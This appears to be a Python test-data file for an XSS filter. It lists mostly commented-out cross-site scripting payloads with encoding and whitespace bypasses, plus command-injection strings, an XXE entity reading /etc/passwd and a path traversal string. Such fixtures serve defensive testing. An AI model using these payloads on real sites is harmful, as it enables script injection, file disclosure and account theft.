# coding: utf-8

xss_test_data = [
    # r"\u0001\u0002\u0003\u0004\u0005\u0006\u0007\b\u000e\u000f\u0010\u0011\u0012\u0013\u0014\u0015\u0016\u0017\u0018\u0019\u001a\u001b\u001c\u001d\u001e\u001f",
    # r"<script>alert(123)</script>",
    # r"&lt;script&gt;alert(&#39;123&#39;);&lt;/script&gt;",
    # r"<img src=x onerror=alert(123) />",
    # r"<svg><script>123<1>alert(123)</script>",
    # r"\"><script>alert(123)</script>",
    # r"'><script>alert(123)</script>",
    # r"><script>alert(123)</script>",
    # r"</script><script>alert(123)</script>",
    # r"< / script >< script >alert(123)< / script >",
    # r" onfocus=JaVaSCript:alert(123) autofocus",
    # r"\" onfocus=JaVaSCript:alert(123) autofocus",
    # r"' onfocus=JaVaSCript:alert(123) autofocus",
    # r"<sc<script>ript>alert(123)</sc</script>ript>",
    # r"--><script>alert(123)</script>",
    # r"\";alert(123);t=\"",
    # r"';alert(123);t='",
    # r"JavaSCript:alert(123)",
    # r";alert(123);",
    # r"src=JaVaSCript:prompt(132)",
    # r"\"><script>alert(123);</script x=\"",
    # r"'><script>alert(123);</script x='",
    # r"><script>alert(123);</script x=",
    # r"\" autofocus onkeyup=\"javascript:alert(123)",
    # r"' autofocus onkeyup='javascript:alert(123)",
    # r"<script\\x20type=\"text/javascript\">javascript:alert(1);</script>",
    # r"<script\\x3Etype=\"text/javascript\">javascript:alert(1);</script>",
    # r"<script\\x0Dtype=\"text/javascript\">javascript:alert(1);</script>",
    # r"<script\\x09type=\"text/javascript\">javascript:alert(1);</script>",
    # r"<script\\x0Ctype=\"text/javascript\">javascript:alert(1);</script>",
    # r"<script\\x2Ftype=\"text/javascript\">javascript:alert(1);</script>",
    # r"<script\\x0Atype=\"text/javascript\">javascript:alert(1);</script>",
    # r"'`\"><\\x3Cscript>javascript:alert(1)</script>",
    # r"'`\"><\\x00script>javascript:alert(1)</script>",
    # r"ABC<div style=\"x\\x3Aexpression(javascript:alert(1)\">DEF",
    # r"ABC<div style=\"x:expression\\x5C(javascript:alert(1)\">DEF",
    # r"ABC<div style=\"x:expression\\x00(javascript:alert(1)\">DEF",
    # r"ABC<div style=\"x:exp\\x00ression(javascript:alert(1)\">DEF",
    # r"ABC<div style=\"x:exp\\x5Cression(javascript:alert(1)\">DEF",
    # r"ABC<div style=\"x:\\x0Aexpression(javascript:alert(1)\">DEF",
    # r"ABC<div style=\"x:\\x09expression(javascript:alert(1)\">DEF",
    # r"ABC<div style=\"x:\\xE3\\x80\\x80expression(javascript:alert(1)\">DEF",
    # r"ABC<div style=\"x:\\xE2\\x80\\x84expression(javascript:alert(1)\">DEF",
    # r"ABC<div style=\"x:\\xC2\\xA0expression(javascript:alert(1)\">DEF",
    # r"ABC<div style=\"x:\\xE2\\x80\\x80expression(javascript:alert(1)\">DEF",
    # r"ABC<div style=\"x:\\xE2\\x80\\x8Aexpression(javascript:alert(1)\">DEF",
    # r"ABC<div style=\"x:\\x0Dexpression(javascript:alert(1)\">DEF",
    # r"ABC<div style=\"x:\\x0Cexpression(javascript:alert(1)\">DEF",
    # r"ABC<div style=\"x:\\xE2\\x80\\x87expression(javascript:alert(1)\">DEF",
    # r"ABC<div style=\"x:\\xEF\\xBB\\xBFexpression(javascript:alert(1)\">DEF",
    # r"ABC<div style=\"x:\\x20expression(javascript:alert(1)\">DEF",
    # r"ABC<div style=\"x:\\xE2\\x80\\x88expression(javascript:alert(1)\">DEF",
    # r"ABC<div style=\"x:\\x00expression(javascript:alert(1)\">DEF",
    # r"ABC<div style=\"x:\\xE2\\x80\\x8Bexpression(javascript:alert(1)\">DEF",
    # r"ABC<div style=\"x:\\xE2\\x80\\x86expression(javascript:alert(1)\">DEF",
    # r"ABC<div style=\"x:\\xE2\\x80\\x85expression(javascript:alert(1)\">DEF",
    # r"ABC<div style=\"x:\\xE2\\x80\\x82expression(javascript:alert(1)\">DEF",
    # r"ABC<div style=\"x:\\x0Bexpression(javascript:alert(1)\">DEF",
    # r"ABC<div style=\"x:\\xE2\\x80\\x81expression(javascript:alert(1)\">DEF",
    # r"ABC<div style=\"x:\\xE2\\x80\\x83expression(javascript:alert(1)\">DEF",
    # r"ABC<div style=\"x:\\xE2\\x80\\x89expression(javascript:alert(1)\">DEF",
    # r"<a href=\"\\x0Bjavascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>",
    # r"<a href=\"\\x0Fjavascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>",
    # r"<a href=\"\\xC2\\xA0javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>",
    # r"<a href=\"\\x05javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>",
    # r"<a href=\"\\xE1\\xA0\\x8Ejavascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>",
    # r"<a href=\"\\x18javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>",
    # r"<a href=\"\\x11javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>",
    # r"<a href=\"\\xE2\\x80\\x88javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>",
    # r"<a href=\"\\xE2\\x80\\x89javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>",
    # r"<a href=\"\\xE2\\x80\\x80javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>",
    # r"<a href=\"\\x17javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>",
    # r"<a href=\"\\x03javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>",
    # r"<a href=\"\\x0Ejavascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>",
    # r"<a href=\"\\x1Ajavascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>",
    # r"<a href=\"\\x00javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>",
    # r"<a href=\"\\x10javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>",
    # r"<a href=\"\\xE2\\x80\\x82javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>",
    # r"<a href=\"\\x20javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>",
    # r"<a href=\"\\x13javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>",
    # r"<a href=\"\\x09javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>",
    # r"<a href=\"\\xE2\\x80\\x8Ajavascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>",
    # r"<a href=\"\\x14javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>",
    # r"<a href=\"\\x19javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>",
    # r"<a href=\"\\xE2\\x80\\xAFjavascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>",
    # r"<a href=\"\\x1Fjavascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>",
    # r"<a href=\"\\xE2\\x80\\x81javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>",
    # r"<a href=\"\\x1Djavascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>",
    # r"<a href=\"\\xE2\\x80\\x87javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>",
    # r"<a href=\"\\x07javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>",
    # r"<a href=\"\\xE1\\x9A\\x80javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>",
    # r"<a href=\"\\xE2\\x80\\x83javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>",
    # r"<a href=\"\\x04javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>",
    # r"<a href=\"\\x01javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>",
    # r"<a href=\"\\x08javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>",
    # r"<a href=\"\\xE2\\x80\\x84javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>",
    # r"<a href=\"\\xE2\\x80\\x86javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>",
    # r"<a href=\"\\xE3\\x80\\x80javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>",
    # r"<a href=\"\\x12javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>",
    # r"<a href=\"\\x0Djavascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>",
    # r"<a href=\"\\x0Ajavascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>",
    # r"<a href=\"\\x0Cjavascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>",
    # r"<a href=\"\\x15javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>",
    # r"<a href=\"\\xE2\\x80\\xA8javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>",
    # r"<a href=\"\\x16javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>",
    # r"<a href=\"\\x02javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>",
    # r"<a href=\"\\x1Bjavascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>",
    # r"<a href=\"\\x06javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>",
    # r"<a href=\"\\xE2\\x80\\xA9javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>",
    # r"<a href=\"\\xE2\\x80\\x85javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>",
    # r"<a href=\"\\x1Ejavascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>",
    # r"<a href=\"\\xE2\\x81\\x9Fjavascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>",
    # r"<a href=\"\\x1Cjavascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>",
    # r"<a href=\"javascript\\x00:javascript:alert(1)\" id=\"fuzzelement1\">test</a>",
    # r"<a href=\"javascript\\x3A:javascript:alert(1)\" id=\"fuzzelement1\">test</a>",
    # r"<a href=\"javascript\\x09:javascript:alert(1)\" id=\"fuzzelement1\">test</a>",
    # r"<a href=\"javascript\\x0D:javascript:alert(1)\" id=\"fuzzelement1\">test</a>",
    # r"<a href=\"javascript\\x0A:javascript:alert(1)\" id=\"fuzzelement1\">test</a>",
    # r"`\"'><img src=xxx:x \\x0Aonerror=javascript:alert(1)>",
    # r"`\"'><img src=xxx:x \\x22onerror=javascript:alert(1)>",
    # r"`\"'><img src=xxx:x \\x0Bonerror=javascript:alert(1)>",
    # r"`\"'><img src=xxx:x \\x0Donerror=javascript:alert(1)>",
    # r"`\"'><img src=xxx:x \\x2Fonerror=javascript:alert(1)>",
    # r"`\"'><img src=xxx:x \\x09onerror=javascript:alert(1)>",
    # r"`\"'><img src=xxx:x \\x0Conerror=javascript:alert(1)>",
    # r"`\"'><img src=xxx:x \\x00onerror=javascript:alert(1)>",
    # r"`\"'><img src=xxx:x \\x27onerror=javascript:alert(1)>",
    # r"`\"'><img src=xxx:x \\x20onerror=javascript:alert(1)>",
    # r"\"`'><script>\\x3Bjavascript:alert(1)</script>",
    # r"\"`'><script>\\x0Djavascript:alert(1)</script>",
    # r"\"`'><script>\\xEF\\xBB\\xBFjavascript:alert(1)</script>",
    # r"\"`'><script>\\xE2\\x80\\x81javascript:alert(1)</script>",
    # r"\"`'><script>\\xE2\\x80\\x84javascript:alert(1)</script>",
    # r"\"`'><script>\\xE3\\x80\\x80javascript:alert(1)</script>",
    # r"\"`'><script>\\x09javascript:alert(1)</script>",
    # r"\"`'><script>\\xE2\\x80\\x89javascript:alert(1)</script>",
    # r"\"`'><script>\\xE2\\x80\\x85javascript:alert(1)</script>",
    # r"\"`'><script>\\xE2\\x80\\x88javascript:alert(1)</script>",
    # r"\"`'><script>\\x00javascript:alert(1)</script>",
    # r"\"`'><script>\\xE2\\x80\\xA8javascript:alert(1)</script>",
    # r"\"`'><script>\\xE2\\x80\\x8Ajavascript:alert(1)</script>",
    # r"\"`'><script>\\xE1\\x9A\\x80javascript:alert(1)</script>",
    # r"\"`'><script>\\x0Cjavascript:alert(1)</script>",
    # r"\"`'><script>\\x2Bjavascript:alert(1)</script>",
    # r"\"`'><script>\\xF0\\x90\\x96\\x9Ajavascript:alert(1)</script>",
    # r"\"`'><script>-javascript:alert(1)</script>",
    # r"\"`'><script>\\x0Ajavascript:alert(1)</script>",
    # r"\"`'><script>\\xE2\\x80\\xAFjavascript:alert(1)</script>",
    # r"\"`'><script>\\x7Ejavascript:alert(1)</script>",
    # r"\"`'><script>\\xE2\\x80\\x87javascript:alert(1)</script>",
    # r"\"`'><script>\\xE2\\x81\\x9Fjavascript:alert(1)</script>",
    # r"\"`'><script>\\xE2\\x80\\xA9javascript:alert(1)</script>",
    # r"\"`'><script>\\xC2\\x85javascript:alert(1)</script>",
    # r"\"`'><script>\\xEF\\xBF\\xAEjavascript:alert(1)</script>",
    # r"\"`'><script>\\xE2\\x80\\x83javascript:alert(1)</script>",
    # r"\"`'><script>\\xE2\\x80\\x8Bjavascript:alert(1)</script>",
    # r"\"`'><script>\\xEF\\xBF\\xBEjavascript:alert(1)</script>",
    # r"\"`'><script>\\xE2\\x80\\x80javascript:alert(1)</script>",
    # r"\"`'><script>\\x21javascript:alert(1)</script>",
    # r"\"`'><script>\\xE2\\x80\\x82javascript:alert(1)</script>",
    # r"\"`'><script>\\xE2\\x80\\x86javascript:alert(1)</script>",
    # r"\"`'><script>\\xE1\\xA0\\x8Ejavascript:alert(1)</script>",
    # r"\"`'><script>\\x0Bjavascript:alert(1)</script>",
    # r"\"`'><script>\\x20javascript:alert(1)</script>",
    # r"\"`'><script>\\xC2\\xA0javascript:alert(1)</script>",
    # r"<img \\x00src=x onerror=\"alert(1)\">",
    # r"<img \\x47src=x onerror=\"javascript:alert(1)\">",
    # r"<img \\x11src=x onerror=\"javascript:alert(1)\">",
    # r"<img \\x12src=x onerror=\"javascript:alert(1)\">",
    # r"<img\\x47src=x onerror=\"javascript:alert(1)\">",
    # r"<img\\x10src=x onerror=\"javascript:alert(1)\">",
    # r"<img\\x13src=x onerror=\"javascript:alert(1)\">",
    # r"<img\\x32src=x onerror=\"javascript:alert(1)\">",
    # r"<img\\x47src=x onerror=\"javascript:alert(1)\">",
    # r"<img\\x11src=x onerror=\"javascript:alert(1)\">",
    # r"<img \\x47src=x onerror=\"javascript:alert(1)\">",
    # r"<img \\x34src=x onerror=\"javascript:alert(1)\">",
    # r"<img \\x39src=x onerror=\"javascript:alert(1)\">",
    # r"<img \\x00src=x onerror=\"javascript:alert(1)\">",
    # r"<img src\\x09=x onerror=\"javascript:alert(1)\">",
    # r"<img src\\x10=x onerror=\"javascript:alert(1)\">",
    # r"<img src\\x13=x onerror=\"javascript:alert(1)\">",
    # r"<img src\\x32=x onerror=\"javascript:alert(1)\">",
    # r"<img src\\x12=x onerror=\"javascript:alert(1)\">",
    # r"<img src\\x11=x onerror=\"javascript:alert(1)\">",
    # r"<img src\\x00=x onerror=\"javascript:alert(1)\">",
    # r"<img src\\x47=x onerror=\"javascript:alert(1)\">",
    # r"<img src=x\\x09onerror=\"javascript:alert(1)\">",
    # r"<img src=x\\x10onerror=\"javascript:alert(1)\">",
    # r"<img src=x\\x11onerror=\"javascript:alert(1)\">",
    # r"<img src=x\\x12onerror=\"javascript:alert(1)\">",
    # r"<img src=x\\x13onerror=\"javascript:alert(1)\">",
    # r"<img[a][b][c]src[d]=x[e]onerror=[f]\"alert(1)\">",
    # r"<img src=x onerror=\\x09\"javascript:alert(1)\">",
    # r"<img src=x onerror=\\x10\"javascript:alert(1)\">",
    # r"<img src=x onerror=\\x11\"javascript:alert(1)\">",
    # r"<img src=x onerror=\\x12\"javascript:alert(1)\">",
    # r"<img src=x onerror=\\x32\"javascript:alert(1)\">",
    # r"<img src=x onerror=\\x00\"javascript:alert(1)\">",
    # r"<a href=java&#1&#2&#3&#4&#5&#6&#7&#8&#11&#12script:javascript:alert(1)>XXX</a>",
    # r"<img src=\"x` `<script>javascript:alert(1)</script>\"` `>",
    # r"<img src onerror /\" '\"= alt=javascript:alert(1)//\">",
    # r"<title onpropertychange=javascript:alert(1)></title><title title=>",
    # r"<a href=http://foo.bar/#x=`y></a><img alt=\"`><img src=x:x onerror=javascript:alert(1)></a>\">",
    # r"<!--[if]><script>javascript:alert(1)</script -->",
    # r"<!--[if<img src=x onerror=javascript:alert(1)//]> -->",
    # r"<script src=\"/\\%(jscript)s\"></script>",
    # r"<script src=\"\\\\%(jscript)s\"></script>",
    # r"<IMG \"\"\"><SCRIPT>alert(\"XSS\")</SCRIPT>\">",
    # r"<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>",
    # r"<IMG SRC=# onmouseover=\"alert('xxs')\">",
    # r"<IMG SRC= onmouseover=\"alert('xxs')\">",
    # r"<IMG onmouseover=\"alert('xxs')\">",
    # r"<IMG SRC=&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;&#39;&#88;&#83;&#83;&#39;&#41;>",
    # r"<IMG SRC=&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058&#0000097&#0000108&#0000101&#0000114&#0000116&#0000040&#0000039&#0000088&#0000083&#0000083&#0000039&#0000041>",
    # r"<IMG SRC=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29>",
    # r"<IMG SRC=\"jav   ascript:alert('XSS');\">",
    # r"<IMG SRC=\"jav&#x09;ascript:alert('XSS');\">",
    # r"<IMG SRC=\"jav&#x0A;ascript:alert('XSS');\">",
    # r"<IMG SRC=\"jav&#x0D;ascript:alert('XSS');\">",
    # r"perl -e 'print \"<IMG SRC=java\\0script:alert(\\\"XSS\\\")>\";' > out",
    # r"<IMG SRC=\" &#14;  javascript:alert('XSS');\">",
    # r"<SCRIPT/XSS SRC=\"http://ha.ckers.org/xss.js\"></SCRIPT>",
    # r"<BODY onload!#$%&()*~+-_.,:;?@[/|\\]^`=alert(\"XSS\")>",
    # r"<SCRIPT/SRC=\"http://ha.ckers.org/xss.js\"></SCRIPT>",
    # r"<<SCRIPT>alert(\"XSS\");//<</SCRIPT>",
    # r"<SCRIPT SRC=http://ha.ckers.org/xss.js?< B >",
    # r"<SCRIPT SRC=//ha.ckers.org/.j>",
    # r"<IMG SRC=\"javascript:alert('XSS')\"",
    # r"<iframe src=http://ha.ckers.org/scriptlet.html <",
    # r"\\\";alert('XSS');//",
    # r"<u oncopy=alert()> Copy me</u>",
    # r"<i onwheel=alert(1)> Scroll over me </i>",
    # r"</textarea><script>alert(123)</script>",
    # r"@{[system \"touch /tmp/blns.fail\"]}",
    # r"eval(\"puts 'hello world'\")",
    # r"System(\"ls -al /\")",
    # r"Kernel.exec(\"ls -al /\")",
    # r"<?xml version=\"1.0\" encoding=\"ISO-8859-1\"?><!DOCTYPE foo [ <!ELEMENT foo ANY ><!ENTITY xxe SYSTEM \"file:///etc/passwd\" >]><foo>&xxe;</foo>",
    # r"The quic\b\b\b\b\b\bk brown fo\u0007\u0007\u0007\u0007\u0007\u0007\u0007\u0007\u0007\u0007\u0007x... [Beeeep]",
    # r"<body",
    # r"<vbscript",
    # r"<script",
    # r"<applet",
    # r"<embed",
    # r"<object",
    # r"<iframe",
    # r"<meta",
    # r"<style",
    # r"<div",
    # r"<javascript:",
    # r"<behavior:",
    # r"< onabort=",
    # r"< onblur=",
    # r"< onchange=",
    # r"< onclick=",
    # r"< ondblclick=",
    # r"< ondragdrop=",
    # r"< onerror=",
    # r"< onfocus=",
    # r"< onkeydown=",
    # r"< onkeypress=",
    # r"< onkeyup=",
    r"< onload=",
    # r"< onmousedown=",
    # r"< onmousemove=",
    # r"< onmouseout=",
    # r"< onmouseover=",
    # r"< onmouseup=",
    # r"< onmove=",
    # r"< onreset=",
    # r"< onresize=",
    # r"< onselect=",
    # r"< onsubmit=",
    # r"< onunload=",
    # r"!--",
    # r"&#",
    # r"\"",
    # r"&{",
    # r"@import",
    # r"-moz-binding",
    # r"document.cookie",
    # r"document.write",
    # r"fromcharcode",
    # " src="
]

non_xss_test_data = [
    # r"!",
    # r'"',
    # r"#",
    # r"$",
    # r"%",
    # r"&",
    # r"'",
    # r"(",
    # r")",
    # r"*",
    # r"+",
    # r",",
    # r"-",
    # r".",
    # r"/",
    # r"0",
    # r"1",
    # r"2",
    # r"3",
    # r"4",
    # r"5",
    # r"6",
    # r"7",
    # r"8",
    # r"9",
    # r":",
    # r";",
    # r"<",
    # r"=",
    # r">",
    # r"?",
    # r"@",
    # r"A",
    # r"B",
    # r"C",
    # r"D",
    # r"E",
    # r"F",
    # r"G",
    # r"H",
    # r"I",
    # r"J",
    # r"K",
    # r"L",
    # r"M",
    # r"N",
    # r"O",
    # r"P",
    # r"Q",
    # r"R",
    # r"S",
    # r"T",
    # r"U",
    # r"V",
    # r"W",
    # r"X",
    # r"Y",
    # r"Z",
    # r"[",
    # r"]",
    # r"^",
    # r"_",
    # r"`",
    # r"a",
    # r"b",
    # r"c",
    # r"d",
    # r"e",
    # r"f",
    # r"g",
    # r"h",
    # r"i",
    # r"j",
    # r"k",
    # r"l",
    # r"m",
    # r"n",
    # r"o",
    # r"p",
    # r"q",
    # r"r",
    # r"s",
    # r"t",
    # r"u",
    # r"v",
    # r"w",
    # r"x",
    # r"y",
    # r"z",
    # r"{",
    # r"|",
    # r"}",
    # r"~",
    # u" ",
    # u"`",
    # u"",
    # u"‚",
    # u"ƒ",
    # u"„",
    # u"…",
    # u"†",
    # u"‡",
    # u"ˆ",
    # u"‰",
    # u"Š",
    # u"‹",
    # u"Œ",
    # u"",
    # u"Ž",
    # u"",
    # u"",
    # u"‘",
    # u"’",
    # u"“",
    # u"”",
    # u"•",
    # u"–",
    # u"—",
    # u"™",
    # u"š",
    # u"›",
    # u"œ",
    # u"",
    # u"ž",
    # u"Ÿ",
    # u" ",
    # u"¡",
    # u"¢",
    # u"£",
    # u"¤",
    # u"¥",
    # u"¦",
    # u"§",
    # u"¨",
    # u"©",
    # u"ª",
    # u"«",
    # u"¬",
    # u"®",
    # u"¯",
    # u"°",
    # u"±",
    # u"²",
    # u"³",
    # u"´",
    # u"µ",
    # u"¶",
    # u"·",
    # u"¸",
    # u"¹",
    # u"º",
    # u"»",
    # u"¼",
    # u"½",
    # u"¾",
    # u"¿",
    # u"À",
    # u"Á",
    # u"Â",
    # u"Ã",
    # u"Ä",
    # u"Å",
    # u"Æ",
    # u"Ç",
    # u"È",
    # u"É",
    # u"Ê",
    # u"Ë",
    # u"Ì",
    # u"Í",
    # u"Î",
    # u"Ï",
    # u"Ð",
    # u"Ñ",
    # u"Ò",
    # u"Ó",
    # u"Ô",
    # u"Õ",
    # u"Ö",
    # u"×",
    # u"Ø",
    # u"Ù",
    # u"Ú",
    # u"Û",
    # u"Ü",
    # u"Ý",
    # u"Þ",
    # u"ß",
    # u"à",
    # u"á",
    # u"â",
    # u"ã",
    # u"ä",
    # u"å",
    # u"æ",
    # u"ç",
    # u"è",
    # u"é",
    # u"ê",
    # u"ë",
    # u"ì",
    # u"í",
    # u"î",
    # u"ï",
    # u"ð",
    # u"ñ",
    # u"ò",
    # u"ó",
    # u"ô",
    # u"õ",
    # u"ö",
    # u"÷",
    # u"ø",
    # u"ù",
    # u"ú",
    # u"û",
    # u"ü",
    # u"ý",
    # u"þ",
    # u"ÿ",
    # r"%20",
    # r"%21",
    # r"%22",
    # r"%23",
    # r"%24",
    # r"%25",
    # r"%26",
    # r"%27",
    # r"%28",
    # r"%29",
    # r"%2A",
    # r"%2B",
    # r"%2C",
    # r"%2D",
    # r"%2E",
    # r"%2F",
    # r"%30",
    # r"%31",
    # r"%32",
    # r"%33",
    # r"%34",
    # r"%35",
    # r"%36",
    # r"%37",
    # r"%38",
    # r"%39",
    # r"%3A",
    # r"%3B",
    # r"%3C",
    # r"%3D",
    # r"%3E",
    # r"%3F",
    # r"%40",
    # r"%41",
    # r"%42",
    # r"%43",
    # r"%44",
    # r"%45",
    # r"%46",
    # r"%47",
    # r"%48",
    # r"%49",
    # r"%4A",
    # r"%4B",
    # r"%4C",
    # r"%4D",
    # r"%4E",
    # r"%4F",
    # r"%50",
    # r"%51",
    # r"%52",
    # r"%53",
    # r"%54",
    # r"%55",
    # r"%56",
    # r"%57",
    # r"%58",
    # r"%59",
    # r"%5A",
    # r"%5B",
    # r"%5C",
    # r"%5D",
    # r"%5E",
    # r"%5F",
    # r"%60",
    # r"%61",
    # r"%62",
    # r"%63",
    # r"%64",
    # r"%65",
    # r"%66",
    # r"%67",
    # r"%68",
    # r"%69",
    # r"%6A",
    # r"%6B",
    # r"%6C",
    # r"%6D",
    # r"%6E",
    # r"%6F",
    # r"%70",
    # r"%71",
    # r"%72",
    # r"%73",
    # r"%74",
    # r"%75",
    # r"%76",
    # r"%77",
    # r"%78",
    # r"%79",
    # r"%7A",
    # r"%7B",
    # r"%7C",
    # r"%7D",
    # r"%7E",
    # r"%7F",
    # r"%E2%82%AC",
    # r"%81",
    # r"%E2%80%9A",
    # r"%C6%92",
    # r"%E2%80%9E",
    # r"%E2%80%A6",
    # r"%E2%80%A0",
    # r"%E2%80%A1",
    # r"%CB%86",
    # r"%E2%80%B0",
    # r"%C5%A0",
    # r"%E2%80%B9",
    # r"%C5%92",
    # r"%C5%8D",
    # r"%C5%BD",
    # r"%8F",
    # r"%C2%90",
    # r"%E2%80%98",
    # r"%E2%80%99",
    # r"%E2%80%9C",
    # r"%E2%80%9D",
    # r"%E2%80%A2",
    # r"%E2%80%93",
    # r"%E2%80%94",
    # r"%CB%9C",
    # r"%E2%84",
    # r"%C5%A1",
    # r"%E2%80",
    # r"%C5%93",
    # r"%9D",
    # r"%C5%BE",
    # r"%C5%B8",
    # r"%C2%A0",
    # r"%C2%A1",
    # r"%C2%A2",
    # r"%C2%A3",
    # r"%C2%A4",
    # r"%C2%A5",
    # r"%C2%A6",
    # r"%C2%A7",
    # r"%C2%A8",
    # r"%C2%A9",
    # r"%C2%AA",
    # r"%C2%AB",
    # r"%C2%AC",
    # r"%C2%AD",
    # r"%C2%AE",
    # r"%C2%AF",
    # r"%C2%B0",
    # r"%C2%B1",
    # r"%C2%B2",
    # r"%C2%B3",
    # r"%C2%B4",
    # r"%C2%B5",
    # r"%C2%B6",
    # r"%C2%B7",
    # r"%C2%B8",
    # r"%C2%B9",
    # r"%C2%BA",
    # r"%C2%BB",
    # r"%C2%BC",
    # r"%C2%BD",
    # r"%C2%BE",
    # r"%C2%BF",
    # r"%C3%80",
    # r"%C3%81",
    # r"%C3%82",
    # r"%C3%83",
    # r"%C3%84",
    # r"%C3%85",
    # r"%C3%86",
    # r"%C3%87",
    # r"%C3%88",
    # r"%C3%89",
    # r"%C3%8A",
    # r"%C3%8B",
    # r"%C3%8C",
    # r"%C3%8D",
    # r"%C3%8E",
    # r"%C3%8F",
    # r"%C3%90",
    # r"%C3%91",
    # r"%C3%92",
    # r"%C3%93",
    # r"%C3%94",
    # r"%C3%95",
    # r"%C3%96",
    # r"%C3%97",
    # r"%C3%98",
    # r"%C3%99",
    # r"%C3%9A",
    # r"%C3%9B",
    # r"%C3%9C",
    # r"%C3%9D",
    # r"%C3%9E",
    # r"%C3%9F",
    # r"%C3%A0",
    # r"%C3%A1",
    # r"%C3%A2",
    # r"%C3%A3",
    # r"%C3%A4",
    # r"%C3%A5",
    # r"%C3%A6",
    # r"%C3%A7",
    # r"%C3%A8",
    # r"%C3%A9",
    # r"%C3%AA",
    # r"%C3%AB",
    # r"%C3%AC",
    # r"%C3%AD",
    # r"%C3%AE",
    # r"%C3%AF",
    # r"%C3%B0",
    # r"%C3%B1",
    # r"%C3%B2",
    # r"%C3%B3",
    # r"%C3%B4",
    # r"%C3%B5",
    # r"%C3%B6",
    # r"%C3%B7",
    # r"%C3%B8",
    # r"%C3%B9",
    # r"%C3%BA",
    # r"%C3%BB",
    # r"%C3%BC",
    # r"%C3%BD",
    # r"%C3%BE",
    # r"%C3%BF",
    # r"http://a/%%30%30",
    # r"%d",
    # r"../../../../../../../../../../../etc/passwd%00",
    # u"Ω",
    # u"≈",
    # u"ç",
    # u"√",
    # u"∫",
    # u"˜",
    # u"µ",
    # u"≤",
    # u"≥",
    # u"÷",
    # u"å",
    # u"ß",
    # u"∂",
    # u"ƒ",
    # u"©",
    # u"˙",
    # u"∆",
    # u"˚",
    # u"¬",
    # u"…",
    # u"æ",
    # u"œ",
    # u"∑",
    # u"´",
    # u"®",
    # u"†",
    # u"¥",
    # u"¨",
    # u"ˆ",
    # u"ø",
    # u"π",
    # u"“",
    # u"‘",
    # u"¡",
    # u"™",
    # u"£",
    # u"¢",
    # u"∞",
    # u"§",
    # u"¶",
    # u"•",
    # u"ª",
    # u"º",
    # u"–",
    # u"≠",
    # u"¸",
    # u"˛",
    # u"Ç",
    # u"◊",
    # u"ı",
    # u"˜",
    # u"Â",
    # u"¯",
    # u"˘",
    # u"¿",
    # u"Å",
    # u"Í",
    # u"Î",
    # u"Ï",
    # u"˝",
    # u"Ó",
    # u"Ô",
    # u"",
    # u"Ò",
    # u"Ú",
    # u"Æ",
    # u"☃",
    # u"Œ",
    # u"„",
    # u"´",
    # u"‰",
    # u"ˇ",
    # u"Á",
    # u"¨",
    # u"ˆ",
    # u"Ø",
    # u"∏",
    # u"”",
    # u"’",
    # u"`",
    # u"⁄",
    # u"€",
    # u"‹",
    # u"›",
    # u"ﬁ",
    # u"ﬂ",
    # u"‡",
    # u"°",
    # u"·",
    # u"‚",
    # u"—",
    # u"±",
    # u"⅛",
    # u"⅜",
    # u"⅝",
    # u"⅞",
    # u"Ё",
    # u"Ђ",
    # u"Ѓ",
    # u"Є",
    # u"Ѕ",
